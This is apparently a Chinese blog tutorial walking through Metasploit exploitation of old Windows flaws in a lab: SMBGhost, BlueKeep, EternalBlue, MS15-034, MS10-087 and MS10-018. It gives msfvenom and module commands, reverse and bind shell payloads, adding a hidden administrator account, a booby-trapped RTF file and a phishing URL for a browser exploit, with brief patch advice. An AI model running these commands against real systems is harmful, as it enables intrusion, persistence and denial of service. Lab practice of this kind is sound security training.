Metasploit之windows操作系统常见漏洞

版本由高到低依次开车

1:永恒之蓝 2.0 <CVE-2020-0796>

  • 解说: 永恒之蓝 2.0 来了,基于 SMBv3 的漏洞,windows88和Windows Server 2012 - Windows 10 最新版全部中招 ,在微软发布修补CVE-2020-0796漏洞的安全更新之前,Cisco Talos分享了通过禁用SMBv3压缩和拦截计算机的445端口来防御利用该漏洞发起的攻击。

- 复现

一、环境准备

目标机:windows10 1903 x64 ip:192.168.17.205 (关闭防火墙)
攻击机:kali ip:192.168.17.190

二、漏洞检测

利用POC检测:
检测工具:https://github.com/ollypwn/SMBGhost

image.png

三、漏洞攻击-蓝屏

POC下载:https://github.com/eerykitty/CVE-2020-0796-PoC

image.png

四、漏洞利用-getshell

脚本下载:https://github.com/chompie1337/SMBGhost_RCE_PoC
msfvenom生成正向连接木马

有关msfvenom详细使用可参考https://www.jianshu.com/p/dee2b171a0a0

msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=4444 -b '\x00' -i 1 -f python

用生成的shellcode将exploit.py中的这一部分替换掉(buf后的字符串,保留USER_PAYLOAD不变)


image.png

开启msf监听
use exploit/multi/handler
set payload windows/x64/meterpreter/bind_tcp
set lport 4444//监听端口
set rhost 192.168.17.205 //目标主机
run

运行exploit.py脚本,反弹shell
按道理来说,这里反弹了一个shell的 可能出现反弹不了,win10的内存调整到4个G以上

image.png

OK,成功 getshell


image.png

技巧,winver查看系统版本


image.png

2:远程3389(CVE-2019-0708)与MS12-020

  • 远程漏洞: 受影响Windows系统版本:Windows7 Windows Server 2008 R2 Windows Server 2008
    Windows 2003 Windows XP , 部分攻击直接导致蓝屏 也有些部分直接返回shell,根据系统硬件所支持

- 复现

一、环境准备

目标机:windows7
攻击机:kali ip:192.168.17.190
受影响的版本


image.png

二、进行攻击:

使用 use exploit/windows/rdp/cve_2019_0708_bluekeep_rce 启用 0708RDP 攻击模块
使用 show options 查看相关信息和设置
关键设置主要为 RHOSTS / RPORT / target

set RHOSTS 受害机IP设置受害机IP
set RPORT 受害机PORT设置受害机RDP端口号
set target ID数字(可选为0-4)设置受害机机器架构
使用的是VMware,那么 target 2 满足条件
使用 exploit 开始攻击,等待建立连接


image.png

建立连接以后,使用shell获得shell


image.png

修复方法:微软已经于2019年05月4日发布了漏洞补丁,请进行相关升级:https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2019-0708#ID0EWIAC
Windows XP 及Windows 2003可以在以下链接下载补丁:https://support.microsoft.com/en-us/help/4500705/customer-guidance-for-cve-2019-0708

3网络服务器攻击渗透测试(MS17-010)

  • 永恒之蓝了,经典了

- 复现

一、环境准备

win7一台

二、进行攻击:

找到exploit windows/smb/ms17_010_eternalblue,
运行use exploitwindows/smb/ms17_010_eternalblue


image.png

输入show options 查看和配置RHOST(靶机)和LHOST(操作机)
由于我用的是虚拟电脑所以我环境已经配置好了。
如果你不知道那台电脑有漏洞你可以输入set LHOSTS 网关/24
如果是[+]前面是这样说明有漏洞,然后再set RHOST +IP。


image.png

设置TCP连接(新版本kali已经做好了这步) set payload windows/x64/meterpreter/reverse_tcp
image.png

run或exploit进行攻击

输入shell进入对方机器增加用户
以创建用户 net user test 1234 /add(xxxx用户名 1234密码)
net localgroup administrators test /add (将用户设置为管理员权限)


image.png

上传文件执行
image.png

4 : CVE-2015-1635-HTTP.SYS远程执行代码漏洞(ms15-034)

  • 利用HTTP.sys的安全漏洞,攻击者只需要发送恶意的http请求数据包,就可能远程读取IIS服务器的内存数据,或使服务器系统蓝屏崩溃 . 根据公告显示,该漏洞对服务器系统造成了不小的影响,主要影响了包括Windows 7、Windows Server 2008 R2、Windows 8、Windows Server 2012、Windows 8.1 和 Windows Server 2012 R2在内的主流服务器操作系统。

- 复现

利用ms15-034漏洞读取服务器内存数据
借助metasploit平台,截图如下:
use auxiliary/scanner/http/ms15_034_http_sys_memory_dump
set rhosts 192.168.80.130
run


image.png

利用ms15-034漏洞进行ddos攻击
同样借助metasploit平台,截图如下:
use auxiliary/dos/http/ms15_034_ulonglongadd
set rhosts 192.168.80.130
set threads 10
run


image.png

攻击开始后,win7瞬间蓝屏然后自动重启,截图如下:
image.png

漏洞修复
禁用IIS内核缓存(可能降低IIS性能)
image.png

image.png

5 : 应用软件格式渗透,利用word去渗透(MS10-087)

  • 如果用户打开或预览特制的RTF电子邮件,则最严重的漏洞可能允许远程执行代码。成功利用这些漏洞中的任何一个的攻击者可以获得与本地用户相同的用户权限。与使用管理用户权限进行操作的用户相比,将其帐户配置为在系统上具有较少用户权限的用户受到的影响较小。
    低版本的word版本会出现RTF文件漏洞。

- 复现

生成文件

msf > search ms10_087
msf > use exploit/windows/fileformat/ms10_087_rtf_pfragments_bof
msf  exploit(ms10_087_rtf_pfragments_bof) > set FILENAME ms10087.rtf
msf  exploit(ms10_087_rtf_pfragments_bof) > set payload windows/meterpreter/reverse_http
msf  exploit(ms10_087_rtf_pfragments_bof) > set LHOST 10.10.10.131
msf  exploit(ms10_087_rtf_pfragments_bof) > exploit

//将文档从BT5拷贝到WIN XP靶机上

root@bt:~# cp /root/.msf4/data/exploits/ms10087.rtf   /root/ms10087.rtf
msf > use exploit/multi/handler
msf  exploit(handler) > set payload windows/meterpreter/reverse_http
payload => windows/meterpreter/reverse_http
msf  exploit(handler) > set LHOST 10.10.10.131
LHOST => 10.10.10.131
msf  exploit(handler) > exploit

6 : 浏览器攻击渗透(MS10-018)

  • 低版本XP系统IE浏览器地址钓鱼
    低版本的word版本会出现RTF文件漏洞。

- 复现

执行search ms10-018命令,搜索路径 browser浏览器的意思


image.png

执行use exploit/windows/browser/ms10_018_ie_behaviors命令。


image.png

执行show options命令,查看要设置哪些东西。
image.png

设置一下自己服务器的ip:set SRVHOST 192.168.11.111。


image.png

设置一个payload正向连接shell:
set PAYLOAD windows/meterpreter/bind_tcp
再看一下我们这个payload的选项配置:show options 一下
image.png

为了便于大家的识别我们把端口进行修改下:set LPORT 4441
image.png

run一下,会有一个url的地址,这个地址就是要通过社工等方法让目标机进行访问。


image.png

我们让目标机访问下这个url,这时msfconsole中就出现了successfuully,我们按回车(这里我尝试了好久,每次靶机访问IE就跳出OD来,最后把靶机里面的OD删掉就好了)。


image.png

我们看下sessions。


image.png

我们进入这个会话sessions -i 1(i就是in进入的意思,1就是会话的ID)。
image.png

成功进入


image.png

7 : 网络服务器攻击渗透(MS08-067)

  • 网络攻击渗透模块了,影响的版本 win2000/xp/2008.2003

- 复现

search ms08-067
use x
set rhost xxx.xxx.xx.xx
run
sucss then.......
shell....

............................................................bye

最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
  • 序言:七十年代末,一起剥皮案震惊了整个滨河市,随后出现的几起案子,更是在滨河造成了极大的恐慌,老刑警刘岩,带你破解...
    沈念sama阅读 212,294评论 6 493
  • 序言:滨河连续发生了三起死亡事件,死亡现场离奇诡异,居然都是意外死亡,警方通过查阅死者的电脑和手机,发现死者居然都...
    沈念sama阅读 90,493评论 3 385
  • 文/潘晓璐 我一进店门,熙熙楼的掌柜王于贵愁眉苦脸地迎上来,“玉大人,你说我怎么就摊上这事。” “怎么了?”我有些...
    开封第一讲书人阅读 157,790评论 0 348
  • 文/不坏的土叔 我叫张陵,是天一观的道长。 经常有香客问我,道长,这世上最难降的妖魔是什么? 我笑而不...
    开封第一讲书人阅读 56,595评论 1 284
  • 正文 为了忘掉前任,我火速办了婚礼,结果婚礼上,老公的妹妹穿的比我还像新娘。我一直安慰自己,他们只是感情好,可当我...
    茶点故事阅读 65,718评论 6 386
  • 文/花漫 我一把揭开白布。 她就那样静静地躺着,像睡着了一般。 火红的嫁衣衬着肌肤如雪。 梳的纹丝不乱的头发上,一...
    开封第一讲书人阅读 49,906评论 1 290
  • 那天,我揣着相机与录音,去河边找鬼。 笑死,一个胖子当着我的面吹牛,可吹牛的内容都是我干的。 我是一名探鬼主播,决...
    沈念sama阅读 39,053评论 3 410
  • 文/苍兰香墨 我猛地睁开眼,长吁一口气:“原来是场噩梦啊……” “哼!你这毒妇竟也来了?” 一声冷哼从身侧响起,我...
    开封第一讲书人阅读 37,797评论 0 268
  • 序言:老挝万荣一对情侣失踪,失踪者是张志新(化名)和其女友刘颖,没想到半个月后,有当地人在树林里发现了一具尸体,经...
    沈念sama阅读 44,250评论 1 303
  • 正文 独居荒郊野岭守林人离奇死亡,尸身上长有42处带血的脓包…… 初始之章·张勋 以下内容为张勋视角 年9月15日...
    茶点故事阅读 36,570评论 2 327
  • 正文 我和宋清朗相恋三年,在试婚纱的时候发现自己被绿了。 大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
    茶点故事阅读 38,711评论 1 341
  • 序言:一个原本活蹦乱跳的男人离奇死亡,死状恐怖,灵堂内的尸体忽然破棺而出,到底是诈尸还是另有隐情,我是刑警宁泽,带...
    沈念sama阅读 34,388评论 4 332
  • 正文 年R本政府宣布,位于F岛的核电站,受9级特大地震影响,放射性物质发生泄漏。R本人自食恶果不足惜,却给世界环境...
    茶点故事阅读 40,018评论 3 316
  • 文/蒙蒙 一、第九天 我趴在偏房一处隐蔽的房顶上张望。 院中可真热闹,春花似锦、人声如沸。这庄子的主人今日做“春日...
    开封第一讲书人阅读 30,796评论 0 21
  • 文/苍兰香墨 我抬头看了看天上的太阳。三九已至,却和暖如春,着一层夹袄步出监牢的瞬间,已是汗流浃背。 一阵脚步声响...
    开封第一讲书人阅读 32,023评论 1 266
  • 我被黑心中介骗来泰国打工, 没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留,地道东北人。 一个月前我还...
    沈念sama阅读 46,461评论 2 360
  • 正文 我出身青楼,却偏偏与公主长得像,于是被迫代替她去往敌国和亲。 传闻我的和亲对象是个残疾皇子,可洞房花烛夜当晚...
    茶点故事阅读 43,595评论 2 350